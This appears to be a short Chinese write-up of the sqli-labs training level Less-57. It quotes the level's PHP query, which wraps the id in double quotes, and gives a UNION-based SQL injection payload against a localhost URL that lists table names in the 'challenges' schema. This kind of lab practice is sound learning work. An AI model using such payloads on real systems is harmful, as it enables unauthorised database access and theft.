与less54、55、56形式是一致的,我们关注sql语句
$id= '"'.$id.'"'; $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
因此给出示例payload
http://127.0.0.1/sql/Less-57/?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+